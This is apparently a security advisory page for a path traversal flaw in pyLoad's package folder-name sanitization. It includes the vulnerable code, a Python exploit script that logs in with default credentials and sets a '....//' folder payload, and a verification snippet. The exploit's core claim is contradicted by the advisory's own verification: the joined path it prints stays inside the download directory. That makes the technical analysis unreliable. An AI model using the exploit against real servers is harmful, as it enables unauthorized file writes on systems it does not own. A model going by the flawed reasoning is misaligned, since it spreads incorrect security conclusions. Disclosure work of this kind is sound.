Launch Week Day 1: Announcing Security Design Review
Start for Free
MEDIUM 6.5 PyPI

PyLoad Vulnerable to Path Traversal via Package Folder Name

GHSA-97r3-5w84-r4q8 · CVE-2026-42314 · PYSEC-2026-128

Published · Modified

Description

Insufficient sanitization of package folder names allows writing files outside the intended download directory.

Affected Component

  • src/pyload/core/api/__init__.py
  • Function: add_package()

Description

Package folder names are sanitized using insufficient string replacement:

folder = (
    folder.replace("http://", "")
    .replace("https://", "")
    .replace("../", "_")  # Bypassable!
    .replace("..\\", "_")
    .replace(":", "")
    .replace("/", "_")
    .replace("\\", "_")
)

The ../ replacement is bypassable. The pattern ....// becomes .._ after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS.

Proof of Concept

Setup

pip install pyload-ng[all]
pyload -d &
# Default credentials: pyload / pyload

Exploit

#!/usr/bin/env python3
import requests

BASE_URL = "http://localhost:8000"
USERNAME = "pyload"
PASSWORD = "pyload"

session = requests.Session()

# Login
session.post(f"{BASE_URL}/login", data={
    "username": USERNAME,
    "password": PASSWORD
})

# Create package with malicious folder name
# The pattern ....// bypasses the ../ replacement
# After sanitization: .._ (still contains ..)
folder_payload = "....//....//....//tmp/evil"

resp = session.post(f"{BASE_URL}/api/add_package", json={
    "name": "test_package",
    "links": ["http://example.com/file.txt"],
    "dest": 1  # Destination.QUEUE
})

package_id = resp.json()
print(f"Created package: {package_id}")

# Set malicious folder name
resp = session.post(f"{BASE_URL}/api/set_package_data", json={
    "package_id": package_id,
    "data": {"folder": folder_payload}
})

print(f"Set folder payload: {folder_payload}")
print(f"Response: {resp.status_code}")

# When download occurs, files will be written outside download dir
print("[+] When a file is downloaded, it will be written to manipulated path")
print("    The sanitized folder still contains '..' sequences that OS resolves")

Verification

Check where files would be written:

import os

download_dir = "/home/user/Downloads"
folder = "....//....//....//tmp/evil"

# Simulate pyLoad's sanitization
sanitized = folder.replace("../", "_").replace("/", "_")
print(f"After pyLoad sanitization: {sanitized}")
# Output: .._.._.._tmp_evil

# When pyLoad does os.path.join and then opens the file:
final_path = os.path.join(download_dir, sanitized)
print(f"Joined path: {final_path}")
# Output: /home/user/Downloads/.._.._.._tmp_evil

# The .. sequences remain and could be resolved by OS during file operations

Impact

Authenticated users with ADD permission can:

  • Write files outside the download directory
  • Potentially overwrite system files (depending on permissions)
  • Clutter system directories with downloaded content

References

Ready to move

Start Securing

Start for Free Get Demo

Free, no credit card | First findings in minutes